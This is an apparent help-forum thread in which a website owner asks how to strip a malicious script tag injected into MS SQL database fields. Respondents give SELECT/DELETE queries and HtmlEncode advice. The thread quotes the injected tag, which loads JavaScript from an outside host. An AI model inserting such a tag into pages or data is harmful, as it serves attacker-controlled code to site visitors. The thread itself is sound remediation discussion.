• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 454
  • Last Modified:

Need to remove an 'unauthorized' script from database fields - help/suggestions

Here's the deal, som jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
bishopandsix
Asked:
bishopandsix
  • 6
  • 5
1 Solution
 
Tomas Helgi JohannssonCommented:
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table by and put a empty string in stead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUM TEXT, LONG TEXT) or BLOB fields  it might be a little more trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
texteditor (like WordPad/Notepad if you use WIndows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
ZippitCommented:
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 
bishopandsixAuthor Commented:
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
The new generation of project management tools

With monday.com’s project management tool, you can see what everyone on your team is working in a single glance. Its intuitive dashboards are customizable, so you can create systems that work for you.

 
ZippitCommented:
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 
bishopandsixAuthor Commented:
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 
bishopandsixAuthor Commented:
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
0
 
ZippitCommented:
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
 
ZippitCommented:

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said then done.
0
 
bishopandsixAuthor Commented:
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
ZippitCommented:
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 
bishopandsixAuthor Commented:
Absolutely no  idea what product. I'll get with my host in the morning and ask.
0
 
bishopandsixAuthor Commented:
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0

Featured Post

The new generation of project management tools

With monday.com’s project management tool, you can see what everyone on your team is working in a single glance. Its intuitive dashboards are customizable, so you can create systems that work for you.

  • 6
  • 5
Tackle projects and never again get stuck behind a technical roadblock.
Join Now